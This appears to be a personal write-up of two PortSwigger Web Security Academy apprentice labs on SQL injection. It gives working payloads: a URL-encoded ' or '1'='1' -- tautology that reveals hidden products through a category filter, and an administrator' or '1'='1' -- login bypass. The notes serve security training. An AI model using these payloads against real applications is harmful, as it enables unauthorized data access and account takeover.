# SQLi - APPRENTICE
###### tags: `Portswigger Web Security Academy` `Web`
[TOC]
## Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
* Hint: This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following: `SELECT * FROM products WHERE category = 'Gifts' AND released = 1`
## Exp
Payload: `https://0a2700a903496ccd807a2626001400e3.web-security-academy.net/filter?category=%27%20or%20%271%27=%271%27%20--%20#`
:::spoiler Success Screenshot

:::
---
## Lab: SQL injection vulnerability allowing login bypass
* Hint: This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.
## Exp
Payload:
Username: `administrator' or '1'='1' -- #`
Password: Arbitrary
:::spoiler Success Screenshot

:::
## Reference
[Burp Suite Security Academy Writeup](https://github.com/frank-leitner/portswigger-websecurity-academy)